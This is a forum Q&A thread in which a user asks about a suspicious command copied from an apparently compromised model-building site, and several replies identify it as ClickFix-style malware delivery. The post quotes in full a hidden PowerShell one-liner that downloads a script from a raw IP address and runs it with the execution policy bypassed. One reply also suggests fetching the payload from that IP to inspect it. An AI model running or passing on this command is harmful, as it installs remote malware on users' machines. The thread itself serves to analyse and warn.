I stumbled upon an old model building website and found a command that looked suspicious, so I copied it to take a closer look. Here's what it says:
`powershell -w h -nop -c "$wgh='http://87.120.126.150/RiH.lim';$uka="$env:TEMP/cuwhz.ps1";Invoke-RestMethod -Uri $wgh -OutFile $uka;powershell -w h -ep bypass -f $uka"`
I'm curious if anyone can shed light on what this command might execute?
6 Answers
You're probably right, that’s some ClickFix malware in action. The site you found is likely fake or hacked. It fetches a file to your temp directory and runs it—probably with more hidden downloads along the way!
What are you hoping to find out by analyzing this script? Just curious about the site replacement or something else?
Looks like this is part of a NetSupport RAT payload via ClickFix. The long base64 strings and file size suggest some sort of malware is being deployed. Check out [this overview on ClickFix](https://alertoverload.com/posts/2025/05/clickfix---an-overview/) for more details!
Basically, this command is set to download malware or potentially unwanted programs from that IP and execute it immediately. Definitely a red flag!
Why not just run part of the command? Avoid executing the part that calls PowerShell and the $uka variable. You can use 'invoke-restmethod' on that IP to see what it's trying to deliver. Please update us after checking it out!
This command seems to download a script named 'cuwhz.ps1' from the specified IP address and then runs it. I can't imagine what the script contains, but it's likely not good news!
I’d prefer not to test it out, I just wanted to know what was going on with that modeling site!